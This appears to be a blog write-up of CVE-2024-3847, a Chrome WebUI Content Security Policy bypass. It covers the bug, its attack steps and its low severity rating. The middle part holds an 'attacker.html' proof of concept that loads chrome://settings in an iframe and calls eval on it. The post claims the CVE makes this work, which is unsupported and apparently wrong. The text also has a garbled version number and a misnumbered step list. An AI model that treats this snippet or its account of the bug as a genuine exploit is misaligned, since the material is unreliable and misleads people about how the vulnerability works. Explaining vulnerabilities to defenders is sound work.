CVE-2024-3847 - Bypassing Content Security Policy in Chrome WebUI (Pre-124..6367.60)

In early 2024, a security issue, now tracked as CVE-2024-3847, was discovered in Google Chrome. The bug centers around insufficient policy enforcement in Chrome's WebUI and, while marked with *low* severity, it gives us a clear example of how browser security layers—specifically Content Security Policy (CSP)—can sometimes be sidestepped with a carefully crafted HTML page. This post provides a detailed walkthrough of the vulnerability, how it could be exploited, and what defenders should know.

What Is This Bug About?

WebUI components in Chrome are special internal pages (like chrome://settings). Google uses CSP on these pages to keep users safe, blocking things like inline scripts and third-party content. With CVE-2024-3847, attackers discovered it was possible, in rare cases, to trick Chrome WebUI into relaxing its CSP controls, letting forbidden scripts run.

Bug report: Chromium Issue 334481916
Official advisory: Google Chrome Releases

How Does the Exploit Work (In Simple Terms)?

A remote attacker could send a malicious HTML page that, under the right conditions, tricks Chrome’s WebUI into letting dangerous JavaScript run on a normally protected internal page. This doesn’t mean drive-by attacks are easy—the target usually needs to intentionally interact with a Chrome-internal page.

Still, if you combine social engineering (like phishing) with this bypass, it’s possible to get code running where it really shouldn’t.

Here’s a sample code snippet that demonstrates the kind of attack logic

<!-- attacker.html -->
<html>
<head>
  <title>Test Chrome WebUI CSP Bypass</title>
</head>
<body>
  <iframe src="chrome://settings" id="webuiframe"></iframe>
  <script>
    // Try to inject a script into the WebUI iframe
    setTimeout(function() {
      var iframe = document.getElementById('webuiframe');
      try {
        // This would normally be stopped by CSP, but CVE allows a bypass
        iframe.contentWindow.eval('alert("CSP bypassed!");');
      } catch (err) {
        // Will typically fail, but with the bug this could work
        console.log("Couldn’t inject:", err);
      }
    }, 200);
  </script>
</body>
</html>

> Note: In the real world, the exploit often requires more subtlety (different WebUI targets, tactics to get privileged frames, etc.), but the basic idea is tricking the browser into ignoring its own security rules.

Attacker sends target a link to a website with the crafted HTML page.

2. The page loads a Chrome WebUI page (chrome://settings) in an <iframe>.
3. Exploit tries to run JavaScript on the Chrome-internal page, bypassing normal CSP protections due to the bug.
4. If successful, attacker’s code runs with the privileges of the WebUI page, which can do more than a standard web page.

Why Is It “Low” Severity?

- The attack *usually* needs the victim to visit a malicious site and interact with a Chrome-internal page.

More Reading

- Chromium Issue 334481916
- CVE Record for CVE-2024-3847
- Google’s Patch Announcement
- Content Security Policy (MDN)

Conclusion

CVE-2024-3847 might not be a blockbuster exploit, but it’s a solid reminder of how even “internal” browser pages can become attack targets. For browser security, every layer (like CSP) matters, and staying updated really is the best defense.


*Know your tools, update often, and don’t underestimate “low” severity bugs—they’re often stepping stones for bigger attacks later!*

Timeline

Published on: 04/17/2024 08:15:10 UTC
Last modified on: 07/03/2024 02:06:43 UTC